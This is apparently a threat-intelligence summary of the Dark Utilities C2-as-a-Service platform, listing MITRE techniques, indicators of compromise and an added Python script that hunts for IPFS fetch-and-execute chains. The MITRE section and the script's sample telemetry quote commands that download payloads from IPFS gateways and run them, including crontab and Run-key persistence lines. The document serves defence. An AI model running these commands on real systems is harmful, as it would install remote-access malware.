Dark Utilities is a C2-as-a-Service platform released in early 2022 that provides remote access, DDoS, and cryptocurrency mining capabilities, with payloads for Windows, Linux, and Python hosted on IPFS to resist takedowns. Malware samples began using the platform for C2 and remote access on infected systems soon after launch. #DarkUtilities #Inplex-sys
Keypoints
- Dark Utilities offers a versatile, low-cost C2 framework that supports Windows, Linux, and Python payloads and is hosted on IPFS, enabling resilience against takedowns.
- Operators have built Discord and Telegram communities for support, and the platform markets premium access for 9.99 euros, attracting thousands of users and generating notable income.
- Malware samples were observed using Dark Utilities soon after launch to establish C2 channels and remote access on Windows and Linux targets.
- The platform includes a centralized Manager panel with modules for DDoS (Layer 4 and Layer 7), cryptocurrency mining, and distributed command execution across compromised hosts.
- IPFS-based hosting and gateways provide "bulletproof hosting" advantages, while Tor2Web gateways enable C2 communication without a Tor client.
- Dark Utilities appears to be driven by the Inplex-sys persona, with connections to other projects and actors (e.g., Lapsus$); activity spans Discord, Telegram, Steam ads, and other platforms.
- Payload analysis shows Python-based malware compiled to Windows PE and Linux ELF, with persistence through Registry Run keys (Windows) or Crontab/Systemd (Linux), and staged delivery of each component via IPFS.
MITRE Techniques
- [T1059.001] PowerShell: The admin panel provides an interactive PowerShell prompt used to execute commands on compromised hosts. "An interactive PowerShell prompt is provided directly within the admin panel."
- [T1059.004] Bash: Linux payload retrieval and execution use a Bash one-liner (e.g., "cd /tmp/;curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client;chmod +x tcp-client; ./tcp-client [ACCOUNT_STRING_PARAMETER]").
- [T1547.001] Registry Run Keys/Startup Folder: Windows persistence by creating a Registry Run key. "If Windows, the malware will create a Registry run key, as shown below."
- [T1053.005] Cron: Linux persistence via a Crontab entry. "It will then create either a Crontab entry or a Systemd service to ensure that the payload is launched following system reboots."
- [T1543.003] Create or Modify Systemd Services: Linux persistence via Systemd service creation. "...or a Systemd service to ensure that the payload is launched following system reboots."
- [T1105] Ingress Tool Transfer: Retrieval of payloads via public IPFS gateways (download, then execute in the same command). "curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> launcher.exe && .launcher.exe [ACCOUNT_STRING_PARAMETER]"
Indicators of Compromise
- [Hash] 09fd574a005f800e6eb37d7e2a3ca640d3ac3ac7dbbde42cbe85aa9e877c1f7f, 0a351f3c9fb0add1397a8e984801061ded0802a3c45d9a5fc7098e806011a464, and 2 more hashes
- [Domain] dark-utilities.xyz, dark-utilities.pw, and 1 more domain
- [IPFS Gateway] ipfs.infura.io, ipfs.infura-ipfs.io (public gateways with legitimate traffic as well; treat hits as context to pivot on, and key detections on the specific CIDs and fetch-then-execute pattern rather than blocking the gateway outright)
- [Onion Domain] dark-utilities.onion.pet
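The MITRE entries above describe one reusable pattern (pull a payload from a public IPFS gateway, execute it in the same command, then re-launch it from crontab, a systemd unit, or a Run key), and the IOC section supplies the gateways and domains to key on. The following is an added hunting example written for this page; it is not code from Talos or from the Dark Utilities project. It refangs the page's own defanged one-liners so they can be fed in directly, extracts IPFS CIDs, and maps each entry to the technique IDs listed above. All telemetry lines are constructed: the first two are the page's commands, the crontab, Run-key and nslookup lines are made up to resemble what a persistence collector or EDR would return, and the `ACCT` placeholder stands in for the platform's account string.

```python
"""Hunt for Dark Utilities-style IPFS fetch-and-execute chains and the
persistence entries that relaunch them.  Added example, not code from Talos
or from the Dark Utilities project.  All input lines are constructed."""
import re

# Gateways and domains taken from this page's Indicators of Compromise.
IPFS_GATEWAYS = {"ipfs.infura.io", "ipfs.infura-ipfs.io"}
C2_DOMAINS = {"dark-utilities.xyz", "dark-utilities.pw", "dark-utilities.onion.pet"}

# Where a persistence entry was collected -> technique this page lists for it.
PERSISTENCE_TECHNIQUE = {
    "crontab": "T1053.005",
    "systemd": "T1543.003",
    "runkey": "T1547.001",
}

# CIDv0 is "Qm" plus 44 base58btc chars (alphabet excludes 0, O, I, l);
# CIDv1 is usually "baf" plus base32.  Case-sensitive on purpose.
IPFS_URL_RE = re.compile(
    r"https?://(?P<host>[A-Za-z0-9.-]+)/ipfs/"
    r"(?P<cid>Qm[1-9A-HJ-NP-Za-km-z]{44}|baf[a-z2-7]{50,})"
)
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.IGNORECASE)
LINUX_EXEC_RE = re.compile(r"chmod\s+\+x|(?:^|[\s;&|])\./[\w.-]+")
WIN_EXEC_RE = re.compile(r"\.\\[\w.-]+|[\w.-]+\.exe\b", re.IGNORECASE)


def refang(text):
    """Undo hxxp / [:] / [.] defanging so report IOCs can be pasted in as-is."""
    return text.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def analyze(line, source="cmdline"):
    """Classify one process command line or persistence entry.

    source: 'cmdline', 'crontab', 'systemd' (ExecStart=) or 'runkey' (a
    HKCU/HKLM ...\\Run value).  Returns CIDs, gateways, C2 domains seen and
    the technique IDs from this page that the entry maps to.
    """
    text = refang(line)
    cids = [m.group("cid") for m in IPFS_URL_RE.finditer(text)]
    gateways = sorted({m.group("host").lower() for m in IPFS_URL_RE.finditer(text)})
    c2_domains = sorted(d for d in C2_DOMAINS if d in text.lower())
    techniques = set()
    fetch_and_exec = False

    if cids and FETCH_RE.search(text):
        techniques.add("T1105")            # Ingress Tool Transfer via an IPFS gateway
        if LINUX_EXEC_RE.search(text):
            techniques.add("T1059.004")    # Bash: chmod +x ...; ./payload
            fetch_and_exec = True
        elif WIN_EXEC_RE.search(text):
            fetch_and_exec = True          # launcher.exe run straight after download

    suspicious = bool(cids or c2_domains)
    if suspicious and source in PERSISTENCE_TECHNIQUE:
        techniques.add(PERSISTENCE_TECHNIQUE[source])

    return {
        "source": source,
        "cids": cids,
        "gateways": gateways,
        "unknown_gateways": [g for g in gateways if g not in IPFS_GATEWAYS],
        "c2_domains": c2_domains,
        "fetch_and_exec": fetch_and_exec,
        "techniques": sorted(techniques),
        "suspicious": suspicious,
    }


def hunt(entries):
    """entries: iterable of (source, line).  Returns only the suspicious results."""
    return [r for r in (analyze(line, src) for src, line in entries) if r["suspicious"]]


# Constructed telemetry: the first two lines are the page's own defanged commands,
# the rest are made up to look like crontab / Run-key / process collector output.
SAMPLE_ENTRIES = [
    ("cmdline", "cd /tmp/;curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client;chmod +x tcp-client; ./tcp-client [ACCOUNT_STRING_PARAMETER]"),
    ("cmdline", "curl hxxps[:]//ipfs[.]infura[.]io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> launcher.exe && .launcher.exe [ACCOUNT_STRING_PARAMETER]"),
    ("crontab", "@reboot cd /tmp && curl https://ipfs.infura-ipfs.io/ipfs/QmVwqSG7TGceZJ6MWnKgYkiyqnW4qTTRq61ADDfMJaPEoG > ./tcp-client && chmod +x ./tcp-client && ./tcp-client ACCT"),
    ("runkey", r"cmd /c curl https://ipfs.infura.io/ipfs/QmRLaPCGa2HZTxMPQxU2VnB9qda3mUv21TXrjbMNqkxN6Z >> C:\Users\Public\launcher.exe && C:\Users\Public\launcher.exe ACCT"),
    ("cmdline", "nslookup dark-utilities.xyz"),
    ("cmdline", "curl -s https://example.com/index.html -o /tmp/index.html"),  # benign control
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_ENTRIES):
        print(r["source"], r["techniques"], r["cids"] or r["c2_domains"])
```

The CID is the durable indicator here: the same content hash resolves through any public gateway, so a hunt keyed on `ipfs.infura.io` alone misses a retrieval routed through another gateway, which is why the result carries `unknown_gateways` separately. Any IPFS fetch chained into an execute is worth a look regardless of gateway; the gateway and C2 domain matches then raise it to a confirmed Dark Utilities pivot.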
Read more: https://blog.talosintelligence.com/2022/08/dark-utilities.html